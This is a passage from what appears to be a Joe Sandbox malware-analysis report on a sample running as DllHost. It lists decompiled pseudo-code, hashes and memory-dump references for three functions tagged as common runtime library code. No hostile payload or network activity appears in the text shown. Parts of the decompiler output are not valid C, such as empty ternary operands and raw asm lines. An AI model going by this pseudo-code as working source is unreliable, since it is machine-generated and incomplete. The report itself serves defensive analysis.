                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 203985260-0
                                                                                                                                                              • Opcode ID: d6ff9972f139bacef62df12ebd7a97088ca08b01fdfb213bb277ac1a358418c2
                                                                                                                                                              • Instruction ID: 5bd5710f06b40e82a472dd215925ae962cdfd98af0c16dd3b00f36081cecdaaa
                                                                                                                                                              • Opcode Fuzzy Hash: d6ff9972f139bacef62df12ebd7a97088ca08b01fdfb213bb277ac1a358418c2
                                                                                                                                                              • Instruction Fuzzy Hash: 11214C72A19B8586E3109F11F40432EB6B4F788BE4F540138DB8953B54DF3CD59A8B54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EC1E8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 239COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF77FF7191EC1E8(intOrPtr __esi, long long __rcx, signed short* __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rsi;
				void* _t75;
				intOrPtr _t78;
				char _t79;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr _t85;
				void* _t109;
				signed long long _t138;
				signed long long _t139;
				long long _t141;
				intOrPtr* _t142;
				intOrPtr* _t143;
				long long _t145;
				intOrPtr* _t147;
				intOrPtr* _t148;
				void* _t150;
				long long _t151;
				signed long long _t156;
				signed short* _t162;
				void* _t166;
				long long _t168;
				signed short* _t170;
				intOrPtr _t179;
				void* _t182;
				void* _t194;
				void* _t195;
				void* _t196;
				signed long long _t197;
				intOrPtr* _t201;
				void* _t207;
				long long _t209;

				_t195 = _t196 - 0x27;
				_t197 = _t196 - 0x90;
				 *((long long*)(_t195 + 0xf)) = 0xfffffffe;
				_t138 =  *0x192190a0; // 0x590452ce5669
				_t139 = _t138 ^ _t197;
				 *(_t195 + 0x1f) = _t139;
				 *(_t195 - 0x21) = __rdx;
				r15d = 0;
				_t85 = r15d;
				 *((intOrPtr*)(_t195 - 0x29)) = r15d;
				if (__rcx == 0) goto 0x191ec23a;
				if (__r8 != 0) goto 0x191ec23a;
				goto 0x191ec531;
				if (__rdx != 0) goto 0x191ec258;
				E00007FF77FF7191DC854(_t139);
				 *_t139 = 0x16;
				E00007FF77FF7191DA5D8();
				goto 0x191ec531;
				E00007FF77FF7191D86F4(_t139 | 0xffffffff, _t150, _t195 - 0x11, __r9, __r8);
				_t141 =  *((intOrPtr*)(_t195 - 9));
				r10d =  *((intOrPtr*)(_t141 + 0xc));
				if (r10d != 0xfde9) goto 0x191ec297;
				 *((long long*)(_t195 - 0x19)) = _t141;
				E00007FF77FF7191F44EC(_t150, __rcx, _t195 - 0x21, __r8, _t195 - 0x19);
				_t151 = _t141;
				goto 0x191ec51a;
				if (__rcx == 0) goto 0x191ec48c;
				if ( *((intOrPtr*)(_t141 + 0x138)) != _t209) goto 0x191ec2f5;
				if (__r8 == 0) goto 0x191ec51a;
				_t162 =  *(_t195 - 0x21);
				if ( *_t162 - 0xff > 0) goto 0x191ec2e7;
				 *((char*)(__rcx + _t151)) =  *_t162;
				 *(_t195 - 0x21) =  &(_t162[1]);
				if (( *_t162 & 0x0000ffff) == 0) goto 0x191ec51a;
				if (_t151 + 1 - __r8 < 0) goto 0x191ec2bb;
				goto 0x191ec51a;
				_t75 = E00007FF77FF7191DC854(_t141);
				goto 0x191ec514;
				_t201 =  *(_t195 - 0x21);
				if ( *((intOrPtr*)(_t141 + 8)) != 1) goto 0x191ec374;
				if (__r8 == 0) goto 0x191ec331;
				_t142 = _t201;
				_t109 =  *_t142 - r15w;
				if (_t109 == 0) goto 0x191ec31a;
				_t143 = _t142 + 2;
				if (_t109 != 0) goto 0x191ec30a;
				if (__r8 - 1 == 0) goto 0x191ec331;
				if ( *_t143 != r15w) goto 0x191ec331;
				_t194 = (_t143 - _t201 >> 1) + 1;
				 *((long long*)(_t197 + 0x38)) = _t195 - 0x29;
				 *((long long*)(_t197 + 0x30)) = _t209;
				 *((intOrPtr*)(_t197 + 0x28)) = __esi;
				 *((long long*)(_t197 + 0x20)) = __rcx;
				r9d = __esi;
				E00007FF77FF7191EB214();
				_t166 = _t75;
				if (_t75 == 0) goto 0x191ec2e7;
				if ( *((intOrPtr*)(_t195 - 0x29)) != r15d) goto 0x191ec2e7;
				_t155 =  !=  ? _t166 : _t166 - 1;
				goto 0x191ec51a;
				_t145 = _t195 - 0x29;
				 *((long long*)(_t197 + 0x38)) = _t145;
				 *((long long*)(_t197 + 0x30)) = _t209;
				 *((intOrPtr*)(_t197 + 0x28)) = __esi;
				 *((long long*)(_t197 + 0x20)) = __rcx;
				_t156 = ( !=  ? _t166 : _t166 - 1) | 0xffffffff;
				r9d = _t85;
				E00007FF77FF7191EB214();
				_t182 = _t75;
				if (_t75 == 0) goto 0x191ec3b6;
				if ( *((intOrPtr*)(_t195 - 0x29)) != r15d) goto 0x191ec50f;
				goto 0x191ec51a;
				if ( *((intOrPtr*)(_t195 - 0x29)) != r15d) goto 0x191ec50f;
				if (GetLastError() != 0x7a) goto 0x191ec50f;
				if (_t194 == 0) goto 0x191ec51d;
				_t35 = _t145 - 0x75; // -117
				r12d = _t35;
				_t78 =  >  ? r12d :  *((intOrPtr*)( *((intOrPtr*)(_t195 - 9)) + 8));
				 *((long long*)(_t197 + 0x38)) = _t195 - 0x29;
				 *((long long*)(_t197 + 0x30)) = _t209;
				 *((intOrPtr*)(_t197 + 0x28)) = _t78;
				 *((long long*)(_t197 + 0x20)) = _t195 + 0x17;
				r9d = 1;
				E00007FF77FF7191EB214();
				if (_t78 == 0) goto 0x191ec50f;
				if ( *((intOrPtr*)(_t195 - 0x29)) != r15d) goto 0x191ec50f;
				if (_t78 < 0) goto 0x191ec50f;
				_t179 = _t78;
				if (_t179 - _t207 > 0) goto 0x191ec50f;
				_t147 = _t179 + _t182;
				if (_t147 - _t194 > 0) goto 0x191ec51d;
				_t168 = _t209;
				if (_t179 <= 0) goto 0x191ec472;
				_t79 =  *((intOrPtr*)(_t195 + _t168 + 0x17));
				 *((char*)(__rcx + _t182)) = _t79;
				if (_t79 == 0) goto 0x191ec51d;
				if (_t168 + 1 - _t179 < 0) goto 0x191ec457;
				 *(_t195 - 0x21) =  &(( *(_t195 - 0x21))[1]);
				if (_t182 + 1 - _t194 >= 0) goto 0x191ec51d;
				goto 0x191ec3e0;
				if ( *((intOrPtr*)(_t147 + 0x138)) != _t209) goto 0x191ec4d0;
				_t170 =  *(_t195 - 0x21);
				_t80 =  *_t170 & 0x0000ffff;
				if (_t80 == 0) goto 0x191ec51d;
				if (_t80 - 0xff > 0) goto 0x191ec4bf;
				if ((_t170[1] & 0x0000ffff) != 0) goto 0x191ec4a9;
				goto 0x191ec51d;
				_t82 = E00007FF77FF7191DC854(_t147);
				 *_t147 = 0x2a;
				goto 0x191ec51d;
				_t148 = _t195 - 0x29;
				 *((long long*)(_t197 + 0x38)) = _t148;
				 *((long long*)(_t197 + 0x30)) = _t209;
				 *((intOrPtr*)(_t197 + 0x28)) = r15d;
				 *((long long*)(_t197 + 0x20)) = _t209;
				r9d = _t85;
				E00007FF77FF7191EB214();
				if (_t82 == 0) goto 0x191ec50f;
				if ( *((intOrPtr*)(_t195 - 0x29)) != r15d) goto 0x191ec50f;
				goto 0x191ec51d;
				_t83 = E00007FF77FF7191DC854(_t148);
				 *_t148 = 0x2a;
				if ( *((intOrPtr*)(_t195 + 7)) == r15b) goto 0x191ec52e;
				 *( *((intOrPtr*)(_t195 - 0x11)) + 0x3a8) =  *( *((intOrPtr*)(_t195 - 0x11)) + 0x3a8) & 0xfffffffd;
				return E00007FF77FF7191D23B0(_t83, r10d,  *(_t195 + 0x1f) ^ _t197);
			}





































                                                                                                                                                              0x7ff7191ec1f3
                                                                                                                                                              0x7ff7191ec1f8
                                                                                                                                                              0x7ff7191ec1ff
                                                                                                                                                              0x7ff7191ec207
                                                                                                                                                              0x7ff7191ec20e
                                                                                                                                                              0x7ff7191ec211
                                                                                                                                                              0x7ff7191ec21b
                                                                                                                                                              0x7ff7191ec21f
                                                                                                                                                              0x7ff7191ec222
                                                                                                                                                              0x7ff7191ec225
                                                                                                                                                              0x7ff7191ec22c
                                                                                                                                                              0x7ff7191ec231
                                                                                                                                                              0x7ff7191ec235
                                                                                                                                                              0x7ff7191ec23d
                                                                                                                                                              0x7ff7191ec23f
                                                                                                                                                              0x7ff7191ec244
                                                                                                                                                              0x7ff7191ec24a
                                                                                                                                                              0x7ff7191ec253
                                                                                                                                                              0x7ff7191ec25f
                                                                                                                                                              0x7ff7191ec265
                                                                                                                                                              0x7ff7191ec269
                                                                                                                                                              0x7ff7191ec274
                                                                                                                                                              0x7ff7191ec278
                                                                                                                                                              0x7ff7191ec28a
                                                                                                                                                              0x7ff7191ec28f
                                                                                                                                                              0x7ff7191ec292
                                                                                                                                                              0x7ff7191ec29a
                                                                                                                                                              0x7ff7191ec2a7
                                                                                                                                                              0x7ff7191ec2ac
                                                                                                                                                              0x7ff7191ec2b7
                                                                                                                                                              0x7ff7191ec2be
                                                                                                                                                              0x7ff7191ec2c2
                                                                                                                                                              0x7ff7191ec2cd
                                                                                                                                                              0x7ff7191ec2d4
                                                                                                                                                              0x7ff7191ec2e0
                                                                                                                                                              0x7ff7191ec2e2
                                                                                                                                                              0x7ff7191ec2e7
                                                                                                                                                              0x7ff7191ec2f0
                                                                                                                                                              0x7ff7191ec2f5
                                                                                                                                                              0x7ff7191ec2fd
                                                                                                                                                              0x7ff7191ec302
                                                                                                                                                              0x7ff7191ec304
                                                                                                                                                              0x7ff7191ec30a
                                                                                                                                                              0x7ff7191ec30e
                                                                                                                                                              0x7ff7191ec310
                                                                                                                                                              0x7ff7191ec318
                                                                                                                                                              0x7ff7191ec31d
                                                                                                                                                              0x7ff7191ec323
                                                                                                                                                              0x7ff7191ec32e
                                                                                                                                                              0x7ff7191ec335
                                                                                                                                                              0x7ff7191ec33a
                                                                                                                                                              0x7ff7191ec33f
                                                                                                                                                              0x7ff7191ec343
                                                                                                                                                              0x7ff7191ec348
                                                                                                                                                              0x7ff7191ec350
                                                                                                                                                              0x7ff7191ec355
                                                                                                                                                              0x7ff7191ec35a
                                                                                                                                                              0x7ff7191ec360
                                                                                                                                                              0x7ff7191ec36b
                                                                                                                                                              0x7ff7191ec36f
                                                                                                                                                              0x7ff7191ec374
                                                                                                                                                              0x7ff7191ec378
                                                                                                                                                              0x7ff7191ec37d
                                                                                                                                                              0x7ff7191ec382
                                                                                                                                                              0x7ff7191ec386
                                                                                                                                                              0x7ff7191ec38b
                                                                                                                                                              0x7ff7191ec38f
                                                                                                                                                              0x7ff7191ec397
                                                                                                                                                              0x7ff7191ec39c
                                                                                                                                                              0x7ff7191ec3a1
                                                                                                                                                              0x7ff7191ec3a7
                                                                                                                                                              0x7ff7191ec3b1
                                                                                                                                                              0x7ff7191ec3ba
                                                                                                                                                              0x7ff7191ec3c9
                                                                                                                                                              0x7ff7191ec3d2
                                                                                                                                                              0x7ff7191ec3d8
                                                                                                                                                              0x7ff7191ec3d8
                                                                                                                                                              0x7ff7191ec3ea
                                                                                                                                                              0x7ff7191ec3f2
                                                                                                                                                              0x7ff7191ec3f7
                                                                                                                                                              0x7ff7191ec3fc
                                                                                                                                                              0x7ff7191ec404
                                                                                                                                                              0x7ff7191ec409
                                                                                                                                                              0x7ff7191ec417
                                                                                                                                                              0x7ff7191ec41e
                                                                                                                                                              0x7ff7191ec428
                                                                                                                                                              0x7ff7191ec430
                                                                                                                                                              0x7ff7191ec436
                                                                                                                                                              0x7ff7191ec43c
                                                                                                                                                              0x7ff7191ec442
                                                                                                                                                              0x7ff7191ec449
                                                                                                                                                              0x7ff7191ec44f
                                                                                                                                                              0x7ff7191ec455
                                                                                                                                                              0x7ff7191ec457
                                                                                                                                                              0x7ff7191ec45b
                                                                                                                                                              0x7ff7191ec461
                                                                                                                                                              0x7ff7191ec470
                                                                                                                                                              0x7ff7191ec47a
                                                                                                                                                              0x7ff7191ec481
                                                                                                                                                              0x7ff7191ec487
                                                                                                                                                              0x7ff7191ec493
                                                                                                                                                              0x7ff7191ec498
                                                                                                                                                              0x7ff7191ec49c
                                                                                                                                                              0x7ff7191ec4a2
                                                                                                                                                              0x7ff7191ec4ac
                                                                                                                                                              0x7ff7191ec4bb
                                                                                                                                                              0x7ff7191ec4bd
                                                                                                                                                              0x7ff7191ec4bf
                                                                                                                                                              0x7ff7191ec4c4
                                                                                                                                                              0x7ff7191ec4ce
                                                                                                                                                              0x7ff7191ec4d0
                                                                                                                                                              0x7ff7191ec4d4
                                                                                                                                                              0x7ff7191ec4d9
                                                                                                                                                              0x7ff7191ec4de
                                                                                                                                                              0x7ff7191ec4e3
                                                                                                                                                              0x7ff7191ec4ec
                                                                                                                                                              0x7ff7191ec4f8
                                                                                                                                                              0x7ff7191ec502
                                                                                                                                                              0x7ff7191ec508
                                                                                                                                                              0x7ff7191ec50d
                                                                                                                                                              0x7ff7191ec50f
                                                                                                                                                              0x7ff7191ec514
                                                                                                                                                              0x7ff7191ec521
                                                                                                                                                              0x7ff7191ec527
                                                                                                                                                              0x7ff7191ec54e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 3215553584-2286445522
                                                                                                                                                              • Opcode ID: 289d1432143a20868925fa2cd4981a65c9df351aedef290fe69bf0dbdb90b92b
                                                                                                                                                              • Instruction ID: 1cda91b97bd1fc916356dc5303da8db07c2346f0402f02708d71899af2cb9311
                                                                                                                                                              • Opcode Fuzzy Hash: 289d1432143a20868925fa2cd4981a65c9df351aedef290fe69bf0dbdb90b92b
                                                                                                                                                              • Instruction Fuzzy Hash: 62A1C822F19E4287FB22AF64A84017DA2F1AF447BCF804631DD5D636C4DE38D49BD620
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C0010 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                              			E00007FF77FF7191C0010(void* __eax, void* __esi, long long* __rcx, signed int __rdx, void* __rbp, void* __r8, long long _a8, long long _a16, signed long long _a32) {
				long long _v64;
				long long _v72;
				signed int _v80;
				long long _v88;
				void* __rbx;
				void* __rsi;
				void* _t64;
				void* _t65;
				signed int _t66;
				long long _t100;
				signed long long _t109;
				long long _t110;
				long long _t112;
				long long _t114;
				unsigned long long _t123;
				signed long long _t140;
				unsigned long long _t142;
				signed long long _t147;
				long long _t154;
				long long* _t155;
				signed int _t166;
				signed long long _t171;
				signed int _t172;
				void* _t173;
				intOrPtr _t174;
				long long _t179;

				_a8 = __rcx;
				_t173 = __r8;
				_t172 = __rdx;
				_t155 = __rcx;
				_t140 = (__rdx >> 5) + (__rdx >> 5 >> 0x3f);
				if (_t140 == 0x49249249) goto 0x191c0294;
				_t11 = _t140 + 1; // 0x24924924924924a
				_t166 = _t11;
				_v80 = _t166;
				_t142 = (_t140 >> 5) + (_t140 >> 5 >> 0x3f);
				_t123 = _t142 >> 1;
				if (_t142 - 0x49249249 - _t123 > 0) goto 0x191c028e;
				_t100 = _t123 + _t142;
				_t109 =  >=  ? _t100 : _t166;
				if (_t109 - 0x49249249 > 0) goto 0x191c028e;
				_t171 = _t109 * 0x70;
				_a32 = _t109;
				if (_t171 - 0x1000 < 0) goto 0x191c0114;
				_t20 = _t171 + 0x27; // 0x27
				if (_t20 - _t171 <= 0) goto 0x191c028e;
				E00007FF77FF7191D23D8(_t100, _t20);
				if (_t100 == 0) goto 0x191c029a;
				_t21 = _t100 + 0x27; // 0x27
				 *((long long*)((_t21 & 0xffffffe0) - 8)) = _t100;
				goto 0x191c013d;
				if (_t171 == 0) goto 0x191c0133;
				E00007FF77FF7191D23D8(_t100, _t171);
				_t154 = _t100;
				_v88 = _t100;
				_a32 = _t109;
				goto 0x191c0142;
				_a32 = _t109;
				_v88 = _t154;
				_t179 = ((__rdx >> 5) + (__rdx >> 5 >> 0x3f)) * 0x70 + _t154;
				_t110 = _t179 + 0x70;
				_v72 = _t110;
				_a16 = _t110;
				_v64 = _t179;
				E00007FF77FF7191B9E00(_t100, _t110, _t179, __r8, _t155);
				_t31 = _t173 + 0x20; // 0x20
				E00007FF77FF7191B9E00(_t100, _t110, _t179 + 0x20, _t31, _t155);
				 *((long long*)(_t179 + 0x40)) =  *((intOrPtr*)(_t173 + 0x40));
				 *((long long*)(_t179 + 0x48)) =  *((intOrPtr*)(_t173 + 0x48));
				 *((intOrPtr*)(_t179 + 0x50)) =  *((intOrPtr*)(_t173 + 0x50));
				asm("inc ecx");
				asm("inc ecx");
				asm("repne inc ecx");
				asm("repne inc ecx");
				_a16 = _t179;
				if (_t172 !=  *((intOrPtr*)(_t155 + 8))) goto 0x191c01bf;
				goto 0x191c01dc;
				_t64 = E00007FF77FF7191C0870( *((intOrPtr*)(_t173 + 0x50)),  *_t155, _t172, _t154, 0x24924925);
				_a16 = _t154;
				_t147 =  *((intOrPtr*)(_t155 + 8));
				_t65 = E00007FF77FF7191C0870(_t64, _t172, _t147, _t154, 0x24924925);
				_t112 =  *_t155;
				if (_t112 == 0) goto 0x191c0263;
				_t174 =  *((intOrPtr*)(_t155 + 8));
				if (_t112 == _t174) goto 0x191c0214;
				_t66 = E00007FF77FF7191BD800(_t65, _t112);
				if (_t112 + 0x70 != _t174) goto 0x191c0200;
				_t114 =  *_t155;
				if (((_t147 >> 5) + (_t147 >> 5 >> 0x3f)) * 0x70 - 0x1000 < 0) goto 0x191c025b;
				if (_t114 -  *((intOrPtr*)(_t114 - 8)) - 8 - 0x1f > 0) goto 0x191c029a;
				0x191d23d0();
				 *_t155 = _t154;
				 *((long long*)(_t155 + 8)) = _v80 * 0x70 + _t154;
				 *((long long*)(_t155 + 0x10)) = _t171 + _t154;
				return _t66 * ( *((intOrPtr*)(_t155 + 0x10)) - _t114);
			}





























                                                                                                                                                              0x7ff7191c0010
                                                                                                                                                              0x7ff7191c0024
                                                                                                                                                              0x7ff7191c0027
                                                                                                                                                              0x7ff7191c002a
                                                                                                                                                              0x7ff7191c006f
                                                                                                                                                              0x7ff7191c007f
                                                                                                                                                              0x7ff7191c0085
                                                                                                                                                              0x7ff7191c0085
                                                                                                                                                              0x7ff7191c0089
                                                                                                                                                              0x7ff7191c00a6
                                                                                                                                                              0x7ff7191c00ac
                                                                                                                                                              0x7ff7191c00b8
                                                                                                                                                              0x7ff7191c00be
                                                                                                                                                              0x7ff7191c00c8
                                                                                                                                                              0x7ff7191c00cf
                                                                                                                                                              0x7ff7191c00d5
                                                                                                                                                              0x7ff7191c00d9
                                                                                                                                                              0x7ff7191c00e8
                                                                                                                                                              0x7ff7191c00ea
                                                                                                                                                              0x7ff7191c00f2
                                                                                                                                                              0x7ff7191c00f8
                                                                                                                                                              0x7ff7191c0100
                                                                                                                                                              0x7ff7191c0106
                                                                                                                                                              0x7ff7191c010e
                                                                                                                                                              0x7ff7191c0112
                                                                                                                                                              0x7ff7191c0117
                                                                                                                                                              0x7ff7191c011c
                                                                                                                                                              0x7ff7191c0121
                                                                                                                                                              0x7ff7191c0124
                                                                                                                                                              0x7ff7191c0129
                                                                                                                                                              0x7ff7191c0131
                                                                                                                                                              0x7ff7191c0135
                                                                                                                                                              0x7ff7191c013d
                                                                                                                                                              0x7ff7191c0146
                                                                                                                                                              0x7ff7191c0149
                                                                                                                                                              0x7ff7191c014d
                                                                                                                                                              0x7ff7191c0152
                                                                                                                                                              0x7ff7191c015a
                                                                                                                                                              0x7ff7191c0165
                                                                                                                                                              0x7ff7191c016b
                                                                                                                                                              0x7ff7191c0173
                                                                                                                                                              0x7ff7191c017c
                                                                                                                                                              0x7ff7191c0184
                                                                                                                                                              0x7ff7191c018c
                                                                                                                                                              0x7ff7191c0190
                                                                                                                                                              0x7ff7191c0195
                                                                                                                                                              0x7ff7191c019a
                                                                                                                                                              0x7ff7191c01a0
                                                                                                                                                              0x7ff7191c01a6
                                                                                                                                                              0x7ff7191c01b8
                                                                                                                                                              0x7ff7191c01bd
                                                                                                                                                              0x7ff7191c01c8
                                                                                                                                                              0x7ff7191c01cd
                                                                                                                                                              0x7ff7191c01d5
                                                                                                                                                              0x7ff7191c01e2
                                                                                                                                                              0x7ff7191c01e8
                                                                                                                                                              0x7ff7191c01ee
                                                                                                                                                              0x7ff7191c01f0
                                                                                                                                                              0x7ff7191c01f7
                                                                                                                                                              0x7ff7191c0203
                                                                                                                                                              0x7ff7191c020f
                                                                                                                                                              0x7ff7191c0211
                                                                                                                                                              0x7ff7191c0241
                                                                                                                                                              0x7ff7191c0256
                                                                                                                                                              0x7ff7191c025e
                                                                                                                                                              0x7ff7191c0263
                                                                                                                                                              0x7ff7191c026f
                                                                                                                                                              0x7ff7191c0277
                                                                                                                                                              0x7ff7191c028d

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: ios_base::failbit set
                                                                                                                                                              • API String ID: 73155330-3924258884
                                                                                                                                                              • Opcode ID: 9231e71fec93e100b79ae819a80ca23594bc02982827a5c155a3d157cf991d09
                                                                                                                                                              • Instruction ID: 0e51fdc207557679e0b5825b04b1c8e033839b34f1bf2375987c1d1a4a12363f
                                                                                                                                                              • Opcode Fuzzy Hash: 9231e71fec93e100b79ae819a80ca23594bc02982827a5c155a3d157cf991d09
                                                                                                                                                              • Instruction Fuzzy Hash: 2651E372B15B4A42EE18EF16B4445A9E3B5FB4ABD8F948131DE9D0B785DE3CE086D300
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D6D44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                              			E00007FF77FF7191D6D44(void* __edx, void* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				void* __r14;
				void* _t73;
				intOrPtr _t78;
				unsigned int _t104;
				void* _t131;
				intOrPtr _t135;
				intOrPtr* _t140;
				signed char* _t144;
				void* _t145;
				void* _t169;
				signed char* _t170;
				long long _t174;
				void* _t175;
				void* _t177;
				void* _t178;
				void* _t193;
				void* _t194;
				void* _t196;

				_t187 = __r9;
				_t131 = __rax;
				 *((long long*)(_t177 + 8)) = __rbx;
				 *((long long*)(_t177 + 0x10)) = _t174;
				 *((long long*)(_t177 + 0x18)) = __rsi;
				_t178 = _t177 - 0x80;
				_t140 = __rcx;
				_t175 = __r9;
				_t194 = __rdx;
				E00007FF77FF7191D8194(_t73, __r8);
				E00007FF77FF7191D4EF8(_t131);
				_t170 =  *((intOrPtr*)(_t178 + 0xc0));
				r8d = 0x80000029;
				r9d = 0x80000026;
				if ( *((intOrPtr*)(_t131 + 0x40)) != 0) goto 0x191d6dbe;
				if ( *__rcx == 0xe06d7363) goto 0x191d6dbe;
				if ( *__rcx != r8d) goto 0x191d6db0;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x191d6db5;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x191d6dbe;
				if ( *__rcx == r9d) goto 0x191d6dbe;
				if (( *_t170 & 0x00000020) != 0) goto 0x191d6fb0;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x191d6ee2;
				if (_t170[8] == 0) goto 0x191d6fb0;
				if ( *(_t170[8] +  *((intOrPtr*)(__r9 + 8)) -  *((char*)(__r8 + 0x7ff719202b50)) - 4) >>  *(__r8 + 0x7ff719202b60) == 0) goto 0x191d6fb0;
				if ( *((intOrPtr*)(_t178 + 0xc8)) != 0) goto 0x191d6fb0;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x191d6ecf;
				if ( *__rcx != r9d) goto 0x191d6e86;
				_t144 = _t170;
				_t78 = E00007FF77FF7191D51A4(__edx, __rcx, _t144, __r9, _t170, __rsi,  *((intOrPtr*)(__r9 + 0x20)), _t194, _t196, _t193);
				r9d = _t78;
				if (_t78 - 0xffffffff < 0) goto 0x191d6fd2;
				if (_t170[8] == 0) goto 0x191d6e6a;
				_t104 =  *(_t170[8] +  *((intOrPtr*)(_t175 + 8)) - _t144[0x7ff719202b50] - 4) >> _t144[0x7ff719202b60];
				if (r9d - _t104 >= 0) goto 0x191d6fd2;
				_t145 = _t194;
				E00007FF77FF7191D7990(_t144[0x7ff719202b60], _t145, _t175, _t170, _t187);
				goto 0x191d6fb0;
				if ( *__rcx != r8d) goto 0x191d6ecf;
				r9d =  *((intOrPtr*)(__rcx + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x191d6fd2;
				if (r9d -  *(_t170[8] +  *((intOrPtr*)(_t175 + 8)) -  *((char*)(_t145 + 0x7ff719202b50)) - 4) >>  *(_t145 + 0x7ff719202b60) >= 0) goto 0x191d6fd2;
				goto 0x191d6e76;
				E00007FF77FF7191D35A8( *((char*)(_t145 + 0x7ff719202b50)), _t194, _t170);
				goto 0x191d6fb0;
				E00007FF77FF7191D7054(_t178 + 0x50, _t170,  *((intOrPtr*)(_t175 + 8)));
				if ( *((intOrPtr*)(_t178 + 0x50)) != _t104) goto 0x191d6f02;
				if (( *_t170 & 0x00000040) == 0) goto 0x191d6fb0;
				if ( *_t140 != 0xe06d7363) goto 0x191d6f77;
				if ( *((intOrPtr*)(_t140 + 0x18)) - 3 < 0) goto 0x191d6f77;
				if ( *((intOrPtr*)(_t140 + 0x20)) - 0x19930522 <= 0) goto 0x191d6f77;
				_t135 =  *((intOrPtr*)(_t140 + 0x30));
				if ( *((intOrPtr*)(_t135 + 8)) == _t104) goto 0x191d6f77;
				E00007FF77FF7191D3DFC(_t135);
				if (_t135 +  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0x30)) + 8)) == 0) goto 0x191d6f77;
				 *(_t178 + 0x38) =  *(_t178 + 0xd8) & 0x000000ff;
				 *((long long*)(_t178 + 0x30)) =  *((intOrPtr*)(_t178 + 0xd0));
				 *((intOrPtr*)(_t178 + 0x28)) =  *((intOrPtr*)(_t178 + 0xc8));
				 *(_t178 + 0x20) = _t170;
				 *0x191f94c0(_t169);
				goto 0x191d6fb5;
				 *(_t178 + 0x38) =  *((intOrPtr*)(_t178 + 0xd0));
				 *((intOrPtr*)(_t178 + 0x30)) =  *((intOrPtr*)(_t178 + 0xc8));
				 *((char*)(_t178 + 0x28)) =  *(_t178 + 0xd8);
				 *(_t178 + 0x20) = _t170;
				E00007FF77FF7191D5E84( *((intOrPtr*)(_t178 + 0xc8)), _t140, _t194, 0x7ff7191b0000, _t175);
				return 1;
			}






















                                                                                                                                                              0x7ff7191d6d44
                                                                                                                                                              0x7ff7191d6d44
                                                                                                                                                              0x7ff7191d6d44
                                                                                                                                                              0x7ff7191d6d49
                                                                                                                                                              0x7ff7191d6d4e
                                                                                                                                                              0x7ff7191d6d58
                                                                                                                                                              0x7ff7191d6d5f
                                                                                                                                                              0x7ff7191d6d62
                                                                                                                                                              0x7ff7191d6d6b
                                                                                                                                                              0x7ff7191d6d6e
                                                                                                                                                              0x7ff7191d6d73
                                                                                                                                                              0x7ff7191d6d78
                                                                                                                                                              0x7ff7191d6d82
                                                                                                                                                              0x7ff7191d6d88
                                                                                                                                                              0x7ff7191d6d91
